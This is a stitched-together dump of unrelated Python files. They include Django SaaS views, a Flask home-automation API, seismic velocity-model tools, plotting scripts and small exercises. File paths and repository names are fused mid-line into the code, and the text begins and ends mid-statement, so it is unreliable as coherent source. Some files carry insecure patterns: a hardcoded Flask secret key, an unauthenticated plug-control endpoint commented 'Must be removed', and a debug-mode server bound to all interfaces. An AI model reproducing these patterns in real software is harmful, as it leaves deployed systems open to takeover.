"ABDOMINAL") self.assertEqual(inst.group.group[1].group[0].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[1].group[0].linkId, "1.2.1") self.assertEqual(inst.group.group[1].group[0].question[0].concept[0].code, "STADPT") self.assertEqual(inst.group.group[1].group[0].question[0].concept[0].display, "pT category") self.assertEqual(inst.group.group[1].group[0].question[0].concept[0].system, "http://example.org/system/code/questions") self.assertEqual(inst.group.group[1].group[0].question[0].linkId, "1.2.1.2") self.assertEqual(inst.group.group[1].linkId, "1.2") self.assertEqual(inst.group.linkId, "1") self.assertTrue(inst.group.required) self.assertEqual(inst.group.title, "Cancer Quality Forum Questionnaire 2012") self.assertEqual(inst.id, "3141") self.assertEqual(inst.status, "draft") self.assertEqual(inst.subjectType[0], "Patient") self.assertEqual(inst.text.status, "generated") # Copyright (c) 2021, DjaoDjin inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # 2. 
Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED # TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ Manage Profile information """ import logging from django import http from django.contrib import messages from django.contrib.auth import REDIRECT_FIELD_NAME from django.core.exceptions import ValidationError from django.db import IntegrityError, transaction from django.views.generic import ( CreateView, DetailView, ListView, TemplateView, UpdateView, ) from . import RedirectFormMixin from .. import settings, signals from ..compat import reverse, NoReverseMatch from ..decorators import _valid_manager from ..forms import OrganizationForm, OrganizationCreateForm, ManagerAndOrganizationForm from ..mixins import OrganizationMixin, ProviderMixin, RoleDescriptionMixin, PlanMixin from ..models import Plan, Subscription, get_broker from ..utils import ( get_organization_model, update_context_urls, update_db_row, validate_redirect_url as validate_redirect_url_base, ) LOGGER = logging.getLogger(__name__) class RoleDetailView(RoleDescriptionMixin, TemplateView): """ List of users with a specific role for an organization. Template: To edit the layout of this page, create a local \ ``saas/profile/roles/role.html`` (`example `__). You should insure the page will call back the :ref:`/api/profile/:organization/roles/:role/ ` API end point to fetch the set of users with the specified role. Template context: - ``role_descr`` Description of the role that defines the permissions of users on an organization - ``organization`` The organization object users have permissions to. - ``request`` The HTTP request object """ template_name = "saas/profile/roles/role.html" def get_template_names(self): candidates = [] role = self.kwargs.get("role", None) if role: candidates = ["saas/profile/roles/%s.html" % role] candidates += super(RoleDetailView, self).get_template_names() return candidates def get_context_data(self, **kwargs): context = super(RoleDetailView, self).get_context_data(**kwargs) role = self.kwargs.get("role", None) context.update({"role_descr": self.role_description}) urls = { "api_candidates": reverse("saas_api_search_users"), "organization": { "api_roles": reverse( "saas_api_roles_by_descr", args=(self.organization, role) ), }, } update_context_urls(context, urls) return context class RoleListView(OrganizationMixin, TemplateView): """ List all ``RoleDescription`` for an organization and the users under each role. 
""" template_name = "saas/profile/roles/index.html" def get_context_data(self, **kwargs): context = super(RoleListView, self).get_context_data(**kwargs) urls = { "organization": { "api_roles": reverse("saas_api_roles", args=(self.organization,)), "api_role_descriptions": reverse( "saas_api_role_description_list", args=(self.organization,) ), } } update_context_urls(context, urls) return context class SubscriberListView(ProviderMixin, TemplateView): """ List of organizations subscribed to a plan provided by the organization. Template: To edit the layout of this page, create a local \ ``saas/profile/subscribers.html`` (`example `__). This page will typically call back :ref:`/api/metrics/:organization/active/ ` and/or :ref:`/api/metrics/:organization/churned/\ ` to fetch the set of active and/or churned subscribers for a provider plans. Template context: - ``organization`` The provider object - ``request`` The HTTP request object """ template_name = "saas/profile/subscribers.html" def get_context_data(self, **kwargs): context = super(SubscriberListView, self).get_context_data(**kwargs) provider = self.provider tabs = [ { "is_active": True, "slug": "subscribed", "title": "Active", "urls": { "download": reverse( "saas_subscriber_pipeline_download_subscribed", args=(provider,) ) }, }, { "slug": "churned", "title": "Churned", "urls": { "download": reverse( "saas_subscriber_pipeline_download_churned", args=(provider,) ) }, }, ] context.update({"tabs": tabs}) if provider.is_broker: context.update( { "registered": { "urls": { "download": reverse( "saas_subscriber_pipeline_download_registered" ) } } } ) return context class PlanSubscribersListView(PlanMixin, TemplateView): """ GET displays the list of plan subscribers. Template: To edit the layout of this page, create a local \ ``saas/profile/plans/subscribers.html`` (`example `__). """ template_name = "saas/profile/plans/subscribers.html" def get_context_data(self, **kwargs): context = super(PlanSubscribersListView, self).get_context_data(**kwargs) context["urls"]["provider"]["api_plan_subscribers"] = reverse( "saas_api_plan_subscriptions", args=(self.provider, self.plan) ) return context class SubscriptionListView(OrganizationMixin, ListView): """ List of Plans this organization is subscribed to. Template: To edit the layout of this page, create a local \ ``saas/profile/subscriptions.html`` (`example `__). You should insure the page will call back the :ref:`/api/profile/:organization/subscriptions/ ` API end point to fetch the set of subscriptions for the organization. Template context: - ``organization`` The subscriber object - ``request`` The HTTP request object """ model = Subscription paginate_by = 10 template_name = "saas/profile/subscriptions.html" def get_queryset(self): return Subscription.objects.active_for(self.organization) def get_context_data(self, **kwargs): context = super(SubscriptionListView, self).get_context_data(**kwargs) context.update( { "plans": Plan.objects.filter( organization__in=get_organization_model().objects.accessible_by( self.request.user, role_descr=settings.MANAGER ) ) } ) context.update({"subscriptions": context["object_list"]}) return context class OrganizationCreateView(RedirectFormMixin, CreateView): """ This page helps ``User`` create a new ``Organization``. By default, the request user becomes a manager of the newly created entity. ``User`` and ``Organization`` are separate concepts links together by manager and other custom ``RoleDescription`` relationships. 
The complete ``User``, ``Organization`` and relationship might be exposed right away to the person registering to the site. This is very usual in Enterprise software. On the hand, a site might decide to keep the complexity hidden by enforcing a one-to-one manager relationship between a ``User`` (login) and an ``Organization`` (payment profile). Template: To edit the layout of this page, create a local \ ``saas/profile/new.html`` (`example `__). Template context: - ``request`` The HTTP request object """ model = get_organization_model() organization_model = get_organization_model() form_class = OrganizationCreateForm pattern_name = "saas_organization_cart" template_name = "saas/profile/new.html" implicit_create_on_none = False def create_organization_from_user(self, user): # pylint:disable=no-self-use with transaction.atomic(): organization = self.organization_model.objects.create( slug=user.get_username(), full_name=user.get_full_name(), email=user.email, ) organization.add_manager(user) return organization def get_implicit_create_on_none(self): return self.implicit_create_on_none def form_valid(self, form): with transaction.atomic(): self.object = form.save() if not _valid_manager(self.request, [get_broker()]): # If it is a manager of the broker platform creating # the newly created Organization will be accessible anyway. self.object.add_manager(self.request.user) return http.HttpResponseRedirect(self.get_success_url()) def get_initial(self): kwargs = super(OrganizationCreateView, self).get_initial() kwargs.update( { "slug": self.request.user.get_username(), "full_name": self.request.user.get_full_name(), "email": self.request.user.email, } ) return kwargs def get_redirect_url(self, *args, **kwargs): # pylint:disable=unused-argument redirect_path = validate_redirect_url_base( self.request.GET.get(REDIRECT_FIELD_NAME, None), sub=True, **kwargs ) if not redirect_path: try: redirect_path = reverse(self.pattern_name, args=(self.object,)) except NoReverseMatch: # Django==2.0 redirect_path = None return redirect_path def get_success_url(self): self.kwargs.update({"organization": self.object}) success_url = self.get_redirect_url(*self.args, **self.kwargs) return str(success_url) def get(self, request, *args, **kwargs): accessibles = self.organization_model.objects.accessible_by(request.user) count = accessibles.count() if count == 0: if self.get_implicit_create_on_none(): try: self.object = self.create_organization_from_user(request.user) return http.HttpResponseRedirect(self.get_success_url()) except IntegrityError: LOGGER.warning( "tried to implicitely create" " an organization that already exists.", extra={"request": request}, ) return super(OrganizationCreateView, self).get(request, *args, **kwargs) class DashboardView(OrganizationMixin, DetailView): """ High-level dashboard for a quick glance of the business in real-time. Template: To edit the layout of this page, create a local \ ``saas/metrics/dashboard.html`` (`example `__). 
Template context: - ``organization`` The provider object - ``request`` The HTTP request object """ model = get_organization_model() slug_url_kwarg = "organization" template_name = "saas/metrics/dashboard.html" def get_context_data(self, **kwargs): context = super(DashboardView, self).get_context_data(**kwargs) if self.organization.is_broker: urls = { "accounts_base": reverse("saas_profile"), "provider": {"api_accounts": reverse("saas_api_search_accounts")}, } else: urls = { "accounts_base": reverse("saas_profile"), "provider": { "api_accounts": reverse( "saas_api_subscribers", args=(self.organization,) ) }, } update_context_urls(context, urls) return context def get_object(self, queryset=None): return self.organization class OrganizationProfileView(OrganizationMixin, UpdateView): """ Page to update contact information of an ``Organization``. Template: To edit the layout of this page, create a local \ ``saas/profile/index.html`` (`example `__). Template context: - ``urls.organization.password_chage`` URL to update user password. - ``organization`` The organization object - ``request`` The HTTP request object """ model = get_organization_model() form_class = OrganizationForm slug_field = "slug" slug_url_kwarg = "organization" template_name = "saas/profile/index.html" def update_attached_user(self, form): validated_data = form.cleaned_data user = self.object.attached_user() if user: setattr( user, user.USERNAME_FIELD, validated_data.get("slug", user.get_username()), ) user.email = validated_data.get("email", user.email) if update_db_row(user, form): raise ValidationError("update_attached_user") return user def form_valid(self, form): validated_data = form.cleaned_data # Calls `get_object()` such that we get the actual values present # in the database. `self.object` will contain the updated values # at this point. changes = self.get_object().get_changes(validated_data) self.object.slug = validated_data.get("slug", self.object.slug) self.object.full_name = validated_data["full_name"] self.object.email = validated_data["email"] if "is_bulk_buyer" in validated_data: self.object.is_bulk_buyer = validated_data["is_bulk_buyer"] else: self.object.is_bulk_buyer = False if "extra" in validated_data: self.object.extra = validated_data["extra"] is_provider = self.object.is_provider if _valid_manager(self.request, [get_broker()]): self.object.is_provider = validated_data.get("is_provider", is_provider) try: with transaction.atomic(): self.update_attached_user(form) if update_db_row(self.object, form): raise ValidationError("form_valid") except ValidationError: return self.form_invalid(form) signals.organization_updated.send( sender=__name__, organization=self.object, changes=changes, user=self.request.user, ) return http.HttpResponseRedirect(self.get_success_url()) def get_form_class(self): if self.object.attached_user(): # There is only one user so we will add the User fields # to the form so they can be updated at the same time. return ManagerAndOrganizationForm return super(OrganizationProfileView, self).get_form_class() def get_initial(self): kwargs = super(OrganizationProfileView, self).get_initial() if Plan.objects.exists(): # Do not display the bulk buying option if there are no plans. 
kwargs.update({"is_bulk_buyer": self.object.is_bulk_buyer}) if _valid_manager(self.request, [get_broker()]): kwargs.update( {"is_provider": self.object.is_provider, "extra": self.object.extra} ) return kwargs def get_success_url(self): messages.info(self.request, "Profile updated.") return reverse("saas_organization_profile", args=(self.object,)) test = {'a': 5, 'b': 6, 'c' :5} print("initial ", test) def clean_dict_value(d, bad_val): # for k in list(d): for k in d.copy(): if d[k] == bad_val: del d[k] print("before changes ",test) print(list(test)) # so list(test) is actually shorthand for list(test.keys()) clean_dict_value(test, 5) print("after changes ",test) # 3b #out of place def clean_dict_values(d, bad_value_list): return {k:v for k,v in d.items() if v not in bad_value_list} # we can zip together two sequences and use them as we wish new_dict = {k:v*v for k,v in zip("kartupelis", range(10))} print(new_dict) cleaned_dict = clean_dict_values(new_dict, [4,64,25]) print(cleaned_dict)scripts/plot_fid.py100-1000 import pickle import os from tl2.proj.argparser import argparser_utils from tl2.proj.matplot import plt_utils def main(data_pkl, data_key, title, outdir): os.makedirs(outdir, exist_ok=True) with open(data_pkl, 'rb') as f: loaded_data = pickle.load(f) data_dict = loaded_data['FID_r64'] data = data_dict[data_key] fig, ax = plt_utils.get_fig_ax() ax.plot(data[:, 0], data[:, 1]) plt_utils.ax_set_ylim(ax, [0, 100]) plt_utils.ax_set_xlabel(ax, xlabel='Iters') plt_utils.ax_set_ylabel(ax, ylabel='FID') plt_utils.ax_set_title(ax, title=title, fontsize=20) plt_utils.savefig(saved_file=f"{outdir}/{data_key}.png", fig=fig, debug=True) pass if __name__ == '__main__': """ python scripts/plot_fid.py --data_key ffhq_r64 """ parser = argparser_utils.get_parser() argparser_utils.add_argument_str(parser, 'data_pkl', default="datasets/data/ffhq_fid.pkl") argparser_utils.add_argument_str(parser, 'data_key', default="") argparser_utils.add_argument_str(parser, 'title', default=r"FFHQ $64\times64$") argparser_utils.add_argument_str(parser, 'outdir', default="results/plot_fid") args, _ = parser.parse_known_args() argparser_utils.print_args(args) main(**vars(args))0 # :coding: utf-8 # :copyright: Copyright (c) 2015 ftrack import ftrack_api_old.entity.base class Component(ftrack_api_old.entity.base.Entity): '''Represent a component.''' def get_availability(self, locations=None): '''Return availability in *locations*. If *locations* is None, all known locations will be checked. Return a dictionary of {location_id:percentage_availability} ''' return self.session.get_component_availability( self, locations=locations ) class CreateThumbnailMixin(object): '''Mixin to add create_thumbnail method on entity class.''' def create_thumbnail(self, path, data=None): '''Set entity thumbnail from *path*. Creates a thumbnail component using in the ftrack.server location :meth:`Session.create_component ` The thumbnail component will be created using *data* if specified. If no component name is given, `thumbnail` will be used. The file is expected to be of an appropriate size and valid file type. .. note:: A :meth:`Session.commit` will be automatically issued. 
''' if data is None: data = {} if not data.get('name'): data['name'] = 'thumbnail' thumbnail_component = self.session.create_component( path, data, location=None ) origin_location = self.session.get( 'Location', ftrack_api_old.symbol.ORIGIN_LOCATION_ID ) server_location = self.session.get( 'Location', ftrack_api_old.symbol.SERVER_LOCATION_ID ) server_location.add_component(thumbnail_component, [origin_location]) # TODO: This commit can be avoided by reordering the operations in # this method so that the component is transferred to ftrack.server # after the thumbnail has been set. # # There is currently a bug in the API backend, causing the operations # to *some* times be ordered wrongly, where the update occurs before # the component has been created, causing an integrity error. # # Once this issue has been resolved, this commit can be removed and # and the update placed between component creation and registration. self['thumbnail_id'] = thumbnail_component['id'] self.session.commit() return thumbnail_component Scripts/main.py # The executable was compiled with pyinstaller import os import sys import argparse from pathlib import Path from const import Const from forms import Forms from games import Games from updater import Updater from settings import Settings updater = Updater(Const.updateurl, Const.version) games = Games(Const.gamesjsonpath) settings = Settings(Const.settingsjsonpath) forms = Forms(updater=updater, games=games, settings=settings) parser = argparse.ArgumentParser() parser.add_argument('--noui', action='store_true') parser.add_argument('--name') parser.add_argument('--path') parser.add_argument('--host', action='store_true') args = parser.parse_args() if __name__ == "__main__": if args.name is not None and args.path is not None: if args.host is not None: games.addgame(args.name, args.path, args.host) else: games.addgame(args.name, args.path) if not args.noui: if not os.path.isfile(Const.gamesjsonpath): if "RemotePlayTogetherHelper" in Path(sys.executable).stem: forms.showSetup() else: forms.showUpdate() forms.showAddGame() forms.showUpdate() while True: forms.showGamelist() # C:\Python\Python3.7.2\Scripts\pyinstaller.exe --onefile main.pyshania3322/joeynmt0 # Copyright (c) Facebook, Inc. and its affiliates. # All rights reserved. # # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. 
# import os.path as op from pathlib import Path FILE_ROOT = Path(__file__).parent with open(op.join(FILE_ROOT, 'VERSION')) as f: __version__ = f.read() from vizseq.ipynb import * from vizseq.ipynb import fairseq_viz as fairseq from setuptools import setup, find_packages setup( name='gros', version='0.3.0', description="General Robot Operator System", author="GRB_ResearchLab", author_email="", packages=find_packages(), include_package_data=True, install_requires=[ 'Click', ], entry_points=''' [console_scripts] gros=gros.gros:cli ''', ) thumblelog/tumblelog/__init__.py from flask import Flask from flask.ext.mongoengine import MongoEngine app = Flask(__name__) app.config["MONGODB_SETTINGS"] = {'DB': "my_tumble_log"} app.config["SECRET_KEY"] = "KeepThisS3cr3t" db = MongoEngine(app) def register_blueprints(app): # Prevents circular imports from tumblelog.views import posts from tumblelog.admin import admin app.register_blueprint(posts) app.register_blueprint(admin) register_blueprints(app) if __name__ == '__main__': app.run()api/rest.py import json import logging import os from logging.handlers import RotatingFileHandler import jsondiff from flask import Flask, render_template, request, jsonify import core.database as db import deg_by_min from core.manager import Manager app = Flask(__name__) @app.route("/__test") def test(): return "running" #### Must be removed @app.route("/command") def command(): action = request.args.get("action").lower() plug = request.args.get("plug") if not action in ["on", "off"]: return "Error - action must be on or off." with open(os.path.join(os.environ["MYH_HOME"], "data", "plugs.json"), 'r') as plugs_file: plug_data = json.load(plugs_file) if not plug in plug_data: return "Error - " + plug + " is not a plug entry." else: plug_data[plug]["plug_state"] = action # save the action for manager with open(os.path.join(os.environ["MYH_HOME"], "data", "plugs.json"), 'w') as plugs_file: json.dump(plug_data, plugs_file) # do the action my_manager = Manager() my_manager.turn_on_off_plug(plug, action) return "done" #### @app.route("/plugs", methods=['GET', 'POST']) def plugs(): with open(os.path.join(os.environ["MYH_HOME"], "data", "plugs.json"), 'r') as plugs_file: plug_data = json.load(plugs_file) if request.method == 'GET': return jsonify(plug_data) else: content = request.get_json() # Compare two structs diff = jsondiff.diff(plug_data, content) if not diff.keys(): # save the action for manager with open(os.path.join(os.environ["MYH_HOME"], "data", "plugs.json"), 'w') as plugs_file: json.dump(content, plugs_file) return "done" else: return "Error in structure !" 
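# A minimal client-side sketch for exercising the endpoints defined above, assuming
# the API runs locally on port 5005 as configured by app.run() near the end of this
# module. The plug name "lamp" and the use of the requests library are illustrative
# assumptions, not part of this file:
#
#   import requests
#   requests.get("http://localhost:5005/command", params={"action": "on", "plug": "lamp"})
#   current = requests.get("http://localhost:5005/plugs").json()   # full plugs.json contents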
@app.route("/deg_by_min") def compute(): return str(deg_by_min.compute_deg_by_min()) @app.route("/weather") def weather(): res = [] with open(os.path.join(os.environ["MYH_HOME"], "data", "weather.json"), 'r') as weather_file: weather_dict = json.load(weather_file) res.append(weather_dict["temp_avg"]) res.append(weather_dict["temp_out"]) res.append(weather_dict["hum_avg"]) res.append(weather_dict["hum_out"]) return '-'.join(str(e) for e in res) @app.route("/charts_dev") def charts_dev(): if not 'day' in request.args: day = 7 else: day = request.args.get('day') myh_db = db.MyHomessistantDatabase() myh_db.connection() data_dict = myh_db.get_charts_dataset(day) # Get act temperature with open(os.path.join(os.environ["MYH_HOME"], "data", "weather.json"), 'r') as weather_file: t_act = json.load(weather_file)["temp_avg"] data_dict["t_act"] = "{0:.2f}".format(t_act) # Json data_sed ready to be sent to myh_db.close() return render_template("charts_dev.html", **locals()) @app.route("/dashboard") def charts(): if not 'day' in request.args: day = 7 else: day = request.args.get('day') myh_db = db.MyHomessistantDatabase() myh_db.connection() data_dict = myh_db.get_charts_dataset(day) # Get act temperature with open(os.path.join(os.environ["MYH_HOME"], "data", "weather.json"), 'r') as weather_file: t_act = json.load(weather_file)["temp_avg"] data_dict["t_act"] = "{0:.2f}".format(t_act) # Json data_sed ready to be sent to myh_db.close() return render_template("dashboard.html", **locals()) if __name__ == '__main__': app.logger.setLevel(logging.INFO) # use the native logger of flask app.logger.disabled = False formatter = logging.Formatter('%(asctime)s %(levelname)s %(funcName)s(%(lineno)d) %(message)s') logfile = os.path.join(os.environ["MYH_HOME"], 'logs', 'rest.log') handler = RotatingFileHandler(logfile, mode='a', maxBytes=5 * 1024 * 1024, backupCount=2, encoding=None, delay=0) handler.setFormatter(formatter) log = logging.getLogger('werkzeug') log.setLevel(logging.INFO) log.addHandler(handler) app.run(debug=True, port=5005, host="0.0.0.0") gely/coseis """ SCEC Community Velocity Model (CVM-H) tools. """ import os import urllib import tarfile import numpy from . import home from . import data from . import vm1d from . import gocad from . import interp repository = home + 'repo' projection = {'proj': 'utm', 'zone': 11, 'datum': 'NAD27', 'ellps': 'clrk66'} extent = (131000.0, 828000.0), (3431000.0, 4058000.0), (-200000.0, 4900.0) prop2d = {'topo': '1', 'base': '2', 'moho': '3'} prop3d = {'vp': '1', 'vs': '3', 'tag': '2'} versions = ['vx62', 'vx63', '11.2.0', '11.9.0'] voxet3d = {'mantle': 'CVM_CM', 'crust': 'CVM_LR', 'lab': 'CVM_HR'} def vs30_model(x, y, version='Wills+Wald', method='nearest'): if version not in ['Wills', 'Wald', 'Wills+Wald']: raise Exception() if 'Wald' in version: z = data.vs30_wald(x, y, method=method) else: z = numpy.empty_like(x) z.fill(float('nan')) if 'Wills' in version: delta = 0.000439344930055 x0 = -121.12460921883338 y0 = 32.53426695497164 f = repository + 'Vs30-Wills-CVMH.npy' w = numpy.load(f, mmap_mode='c') xlim = x0, x0 + delta * (w.shape[0] - 1) ylim = y0, y0 + delta * (w.shape[1] - 1) extent = xlim, ylim interp.interp2(extent, w, (x, y), z, method=method) return z def nafe_drake(f): """ Density derived from V_p via Nafe-Drake curve, Brocher (2005) eqn 1. """ f *= 0.001 f = f * ( 1.6612 - f * (0.4721 - f * (0.0671 - f * (0.0043 - f * 0.000106)))) f = numpy.maximum(f, 1.0) * 1000.0 return f def brocher_vp(f): """ V_p derived from V_s via Brocher (2005) eqn 9. 
""" f *= 0.001 f = 0.9409 + f * (2.0947 - f * (0.8206 - f * (0.2683 - f * 0.0251))) f *= 1000.0 return f def ely_vp(f): """ V_p derived from V_s via Ely (2012). """ f = 400.0 + 1.4 * f return f def cvmh_voxet(prop=None, voxet=None, no_data_value=None, version=None): """ Download and read SCEC CVM-H voxet. Parameters: prop: 2d property: 'topo', 'base', or 'moho' 3d property: 'Vp', 'Vs', or 'tag' voxet: 3d voxet: 'mantle', 'crust', or 'lab' no_data_value: None, 'nan', or float value. None = filled from below. version: 'vx62', 'vx63', '11.2.0', '11.9.0' or None (default) Returns: extent: (x0, x1), (y0, y1), (z0, z1) data: Array of properties """ if version is None: version = versions[-1] path = repository + 'CVMH-%s' % version if version[:2] == 'vx': u = 'http://structure.harvard.edu/cvm-h/download/%s.tar.bz2' f = path + '.bztar' base = '%s/bin' else: u = 'http://hypocenter.usc.edu/research/cvmh/11.9.0/cvmh-%s.tar.gz' f = path + '.tgz' base = 'cvmh-%s/model' u %= version base %= version # download if not found if not os.path.exists(path): if not os.path.exists(f): print('Downloading %s' % u) urllib.urlretrieve(u, f) print('Extracting %s' % f) tar = tarfile.open(f) os.mkdir(path) with tar as tar: for t in tar: if not t.name.startswith(base): continue if t.name.endswith('.vo') or t.name.endswith('@@'): f = os.path.join(path, os.path.split(t.name)[1]) open(f, 'wb').write(tar.extractfile(t).read()) # fill 3d voxets turd = os.path.join(path, 'filled') if not os.path.exists(turd): for vox in voxet3d: print('Filling voxet %s %s' % (version, vox)) vp, vs, tag = prop3d['vp'], prop3d['vs'], prop3d['tag'] vid = voxet3d[vox] voxfile = os.path.join(path, vid + '.vo') vox = gocad.voxet(voxfile, [vp, vs, tag])['1'] w = vox['AXIS']['W'][2] d1 = vox['PROP'][vp]['DATA'] d2 = vox['PROP'][vs]['DATA'] d3 = vox['PROP'][tag]['DATA'] v1 = vox['PROP'][vp]['NO_DATA_VALUE'] v2 = vox['PROP'][vs]['NO_DATA_VALUE'] n = d1.shape[2] if w > 0.0: for i in range(1, n): ii = (d1[:, :, i] == v1) | (d2[:, :, i] == v2) d1[:, :, i][ii] = d1[:, :, i-1][ii] d2[:, :, i][ii] = d2[:, :, i-1][ii] d3[:, :, i][ii] = d3[:, :, i-1][ii] else: for i in range(n-1, 0, -1): ii = (d1[:, :, i-1] == v1) | (d2[:, :, i-1] == v2) d1[:, :, i-1][ii] = d1[:, :, i][ii] d2[:, :, i-1][ii] = d2[:, :, i][ii] d3[:, :, i-1][ii] = d3[:, :, i][ii] f1 = os.path.join(path, vox['PROP'][vp]['FILE'] + '-filled') f2 = os.path.join(path, vox['PROP'][vs]['FILE'] + '-filled') f3 = os.path.join(path, vox['PROP'][tag]['FILE'] + '-filled') d1.T.tofile(f1) d2.T.tofile(f2) d3.T.tofile(f3) open(turd, 'w') # voxet ID if voxet in voxet3d: vid = voxet3d[voxet] else: vid = 'interfaces' voxfile = os.path.join(path, vid + '.vo') # load voxet if prop is None: return gocad.voxet(voxfile) prop = prop.lower() if prop in prop2d: pid = prop2d[prop] else: pid = prop3d[prop] if no_data_value is None and prop in prop3d: vox = gocad.voxet(voxfile, [pid], alternate='-filled')['1'] else: vox = gocad.voxet(voxfile, [pid], no_data_value=no_data_value)['1'] # extent x, y, z = vox['AXIS']['O'] u, v, w = vox['AXIS']['U'][0], vox['AXIS']['V'][1], vox['AXIS']['W'][2] extent = (x, x + u), (y, y + v), (z, z + w) # property data data = vox['PROP'][pid]['DATA'] return extent, data class Model(): """ SCEC CVM-H model. Init parameters: prop: 2d property: 'topo', 'base', 'moho' 3d property: 'vp', 'vs', or 'tag' voxet: 3d voxet list: ['mantle', 'crust', 'lab'] no_data_value: None or float value (can be float('nan'). None = filled from below. 
version: 'vx62', 'vx63', '11.2.0', 11.9.0' or None (default) Call parameters: x, y, z: Sample coordinate arrays. out: Optional output array with same shape as coordinate arrays. interpolation: 'nearest', or 'linear' Returns property samples at coordinates (x, y, z) """ def __init__( self, prop, voxet=['mantle', 'crust'], no_data_value=None, version=None ): self.prop = prop = prop.lower() if prop in prop2d: self.voxet = [cvmh_voxet(prop, version=version)] else: self.voxet = [] for i in voxet: self.voxet += [cvmh_voxet(prop, i, no_data_value, version)] return def __call__(self, x, y, z=None, out=None, interpolation='nearest'): if out is None: out = numpy.empty_like(x) out.fill(float('nan')) for extent, v in self.voxet: if z is None: v = v.reshape(v.shape[:2]) interp.interp2(extent[:2], v, (x, y), out, interpolation) else: interp.interp3(extent, v, (x, y, z), out, interpolation) return out class Extraction(): """ CVM-H extraction with geotechnical layer (GTL) Init parameters: x, y: Coordinates arrays vm: 'vp', 'vs', 'tag', or Model object. vs30: 'Wills', 'Wald', 'Wills+Wald', None, or Model object. topo: 'topo' or Model object. interpolation: 'nearest', or 'linear'. geographic: X Y coordinate type, True for geographic, False for UTM. **kwargs: Keyword arguments passed to Model() Call parameters z: Vertical coordinate array. out: Optional output array, same shape as coordinate arrays. min_depth: Minimum depth in Z array, optional but provides speed-up. by_depth: Z coordinate type, True for depth, False for elevation. Returns property samples at coordinates (x, y, z) """ def __init__( self, x, y, vm, vs30='Wills+Wald', topo='topo', interpolation='nearest', geographic=True, **kwargs ): x = numpy.asarray(x) y = numpy.asarray(y) if isinstance(vm, str): vm = Model(vm, **kwargs) if vm.prop in prop2d: raise Exception('Cannot extract 2D model') elif vm.prop == 'tag': vs30 = None if isinstance(topo, str): topo = Model(topo, **kwargs) if geographic: import pyproj lon, lat = x, y proj = pyproj.Proj(**projection) x, y = proj(lon, lat) x = x.astype(lon.dtype) y = y.astype(lat.dtype) z0 = topo(x, y, interpolation='linear') if vs30 is None: zt = None else: zt = 350.0 if not geographic: import pyproj proj = pyproj.Proj(**projection) lon, lat = proj(x, y, inverse=True) lon = lon.astype(x.dtype) lat = lat.astype(y.dtype) v0 = vs30_model(lon, lat, vs30) if vm.prop == 'vp': v0 = ely_vp(v0) vt = vm(x, y, z0 - zt, interpolation=interpolation) v0 = numpy.minimum(vt, v0) # XXX new feature if numpy.isnan(vt).any(): print('WARNING: NaNs in GTL') self.gtl = v0, vt self.x, self.y, self.z0, self.zt = x, y, z0, zt self.vm, self.interpolation = vm, interpolation return def __call__(self, z, out=None, min_depth=None, by_depth=True): x, y, z0, zt = self.x, self.y, self.z0, self.zt vm, interpolation = self.vm, self.interpolation z = numpy.asarray(z) if out is None: out = numpy.empty_like(z) out.fill(float('nan')) if by_depth is False: vm(x, y, z, out, interpolation) z = z0 - z else: vm(x, y, z0 - z, out, interpolation) if zt: if min_depth is None: min_depth = z.min() if min_depth < zt: v0, vt = self.gtl i = z < zt out[i] = vm1d.v30gtl(v0, vt, z, zt)[i] return out def extract(x, y, z, vm=['rho', 'vp', 'vs'], by_depth=True, **kwargs): """ Simple CVM-H extraction. x, y, z: Coordinates arrays vm: 'rho', 'vp', 'vs', 'tag', or Model object. by_depth: Z coordinate type, True for depth, False for elevation. 
**kwargs: Keyword arguments passed to Extraction() Returns property samples at coordinates (x, y, z) """ x = numpy.asarray(x) y = numpy.asarray(y) if not isinstance(vm, (list, tuple)): vm = [vm] out = [] f = None for v in vm: prop = v = v.lower() if v == 'rho': prop = 'vp' if not out or prop != f.vm.prop: f = Extraction(x, y, prop, **kwargs) if v == 'rho': out += [nafe_drake(f(z, by_depth=by_depth))] else: out += [f(z, by_depth=by_depth)] return numpy.array(out) import seren3, sys from seren3.analysis.visualization import EngineMode path = sys.argv[1] iout = int(sys.argv[2]) snap = seren3.load_snapshot(path, iout) halos = snap.halos(finder='ctrees') h = halos.sort("Mvir")[0] proj = h.d.projection("mass", mode=EngineMode.SPLATTER)# import the necessary packages from imutils import paths import numpy as np import argparse import imutils import cv2 images = [] images.append(cv2.imread('01_suburbA.jpg')) images.append(cv2.imread('01_suburbB.jpg')) print("[INFO] stitching images...") stitcher = cv2.createStitcher() if imutils.is_cv3() else cv2.Stitcher_create() (status, stitched) = stitcher.stitch(images) try: import os if os.environ.get("PIPUPGRADE_JOBS_GEVENT_PATCH"): from gevent import monkey monkey.patch_all(threaded = False, select = False) except ImportError: pass # imports - module imports from pipupgrade.__attr__ import ( __name__, __version__, __author__ ) from pipupgrade.__main__ import main from pipupgrade.config import Settings from pipupgrade import _pip from pipupgrade.util.jobs import run_all as run_all_jobs, run_job settings = Settings() from pipupgrade.tree import Nodefrom .base import * from .case1 import case_1 from .case2 import case_2 from .case3 import case_3 from .case4 import case_4 from .case5 import case_5 # -*- coding: utf-8 -*- """ Settings module for lichessmate. Make sure you fill in every setting correctly. """ # Server address (e.g. 'irc.server.org') SERVER = 